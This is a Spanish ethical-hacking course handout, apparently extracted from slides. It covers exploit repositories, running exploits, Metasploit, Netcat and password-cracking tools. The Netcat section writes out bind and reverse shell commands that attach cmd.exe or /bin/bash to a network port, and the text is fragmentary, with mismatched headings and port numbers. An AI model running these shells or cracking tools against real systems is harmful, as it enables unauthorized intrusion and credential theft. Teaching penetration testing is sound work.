Explotacin de Vulnerabilidades
Temas:
Ethical Hacking
Ethical Hacking 134
Una vez encontrado el exploit hay que revisar el cdigo fuente, para primero
confirmar que no es falso (fake) y luego, revisar para qu plataformas ha sido
diseado. En algunos casos ser necesario modificar el exploit antes de ejecutarlo.
Hay que tener en cuenta que muchas vulnerabilidades no son reportadas y pueden
permanecer sin ser parchadas por aos (Ejemplo: Microsoft ms08-067). Estas
vulnerabilidades son las llamadas 0day que muchos hackers maliciosos comparten
o venden.
Ethical Hacking 135
1.3 Packetstorm
(http://www.packetstormsecurity.org/assess/exploits/)
Es otro portal donde se pueden encontrar exploits recientes, adems de
herramientas de seguridad para fines educativos solamente.
Ethical Hacking 137
C
Extensin: .c, .cc
gcc exploit.c -o binario
./binario parametros
Perl
Extensin: .pl
perl exploit.pl parametros
Python
Extensin: .py
python exploit.py parametros
Ethical Hacking 138
Ruby
Extensin: .rb
ruby exploit.rb parametros
PHP
Extensin: .php
php exploit.php parametros
Muchas veces los investigadores que liberan los exploits no los dejan listos,
sino con algunas fallas para que no sean utilizados por script kiddies. En
esos escenarios, se tendr que revisar todo el cdigo fuente para encontrar
el error y parcharlo, lo que hace ms interesante la explotacin de la
vulnerabilidad.
Ethical Hacking 139
2. Metasploit Framework
2.1 Instalacin
2. Una vez que las dependencias han sido instaladas, baje el cdigo
fuente de la ltima versin de metasploit desde el siguiente link:
http://www.metasploit.com/framework/download/
2.2 Uso
Parmetro Descripcin
-v Verbose, sirve para obtener en pantalla
informacin adicional sobre las conexiones.
-l Listen, modo escucha, sirve para dejar a la
escucha en un puerto especfico.
-p Port, con este parmetro se define el puerto que
entrar en escucha.
-o archivo Dump, hace un dump del trfico en
hexadecimal.
-e Nombre Con este parmetro se define el programa que
ser ejecutado una vez establecida la conexin.
-h Muestra la ayuda
-u UDP, para realizar conexiones con el protocolo
de transporte UDP.
Mquina A:
Se deja a Netcat escuchando en un puerto y que redirija cualquier
entrada hacia un archivo: nc -lvp 4444 > salida.txt
Mquina B:
Se conecta al puerto en escucha en la Mquina 1 (en el puerto 4444) y se
enva el fichero: nc -vv 192.168.1.1 444 < test.txt
Ethical Hacking 145
Mquina A:
Para Windows: nc -lvvp 4444 -e cmd.exe
Para Linux: nc -lvvp 444 -e /bin/bash
Mquina B:
nc -v 192.168.1.1 4444
Ethical Hacking 146
Mquina B:
nc -lvvp 4444
Mquina A:
Para Windows: nc -v 192.168.1.1 4444 -e cmd.exe
Para Linux: nc -v 192.168.1.1 4444 -e /bin/bash
Ethical Hacking 147
4. Password Cracking
En una auditora de sistemas o hacking tico, siempre hay una fase en la que se
ejecutan ataques contra las contraseas para realizar una auditora a las polticas
de passwords implementadas en la organizacin o la falta de stas.
Ethical Hacking 148
Los ataques por fuerza bruta, dado que utilizan el mtodo de prueba
y error, son muy costosos en tiempo computacional. Este tipo de
ataque, tericamente, no puede ser resistido por ningn sistema,
siempre y cuando se disponga del tiempo suficiente. As, las claves lo
suficientemente largas, ponen una limitacin fsica al xito de estos
ataque, pero no lgica. Estas limitaciones fsicas son dinmicas y van
disminuyendo a medida que los computadores van alcanzando ms
capacidad de cmputo.
4.2 Herramientas
b) Medusa ( http://www.foofus.net/~jmk/medusa/medusa.html )
Es una herramienta veloz y modular de software libre que se
aprovecha de la programacin en paralelo, para realizar tareas de
password cracking a nivel de red. Medusa fue programada por el
grupo de Foofus.net y tiene mdulos que soportan los siguientes
servicios: CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),
PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP
(VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd y VNC.
c) Lopthcrack ( http://www.l0phtcrack.com/ )
Es una herramienta comercial para la auditoria y recuperacin de
passwords en plataformas Windows y GNU/Linux. Para realizar esta
tarea, se basa en los hashes guardados por el sistema operativo.
Tambin tiene la capacidad de analizar el trfico (sniffear) en busca
de credenciales. Con Lopthcrack se pueden realizar ataques por
diccionario y fuerza bruta.
Ethical Hacking 151
Nota:
Una lista con las 10 mejores herramientas de Password Cracking puede ser encontrada en:
http://sectools.org/crackers.html
Ethical Hacking 152
Laboratorio N 8